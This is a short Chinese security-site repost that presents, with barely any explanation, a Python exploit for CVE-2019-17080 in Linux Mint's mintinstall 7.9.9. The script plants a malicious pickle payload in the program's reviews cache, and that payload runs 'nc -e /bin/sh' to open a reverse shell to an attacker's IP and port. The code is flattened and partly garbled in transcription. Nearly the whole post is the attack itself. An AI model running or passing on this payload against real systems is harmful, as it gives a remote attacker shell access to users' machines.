mintinstall 7.9.9-代码执行(CVE-2019-17080)

颓废 2019年11月21日23:52:14评论887 views字数 542阅读1分48秒阅读模式
摘要

直接上Exp

直接上Exp

# Exploit Title: mintinstall (aka Software Manager) object injection # Date: 10/02/2019 # Exploit Author: Andhrimnirr # Vendor Homepage: https://www.linuxmint.com/ # Software Link: mintinstall (aka Software Manager) # Version: 7.9.9 # Tested on: Linux Mint # CVE : CVE-2019-17080   import os import sys def shellCode(payload):     with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:         wb.write(payload)     print("[+] Start mintinstall") if __name__=="__main__":     shellCode(f"""cos/nsystem/n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"/ntR.""") else:     print("[!] exploit.py [IP] [PORT]")

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年11月21日23:52:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   mintinstall 7.9.9-代码执行(CVE-2019-17080)https://cn-sec.com/archives/74185.html

发表评论

匿名网友 填写信息